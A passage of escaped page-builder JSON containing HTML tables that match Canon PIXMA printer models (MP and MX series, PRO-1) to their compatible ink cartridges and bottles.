width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td 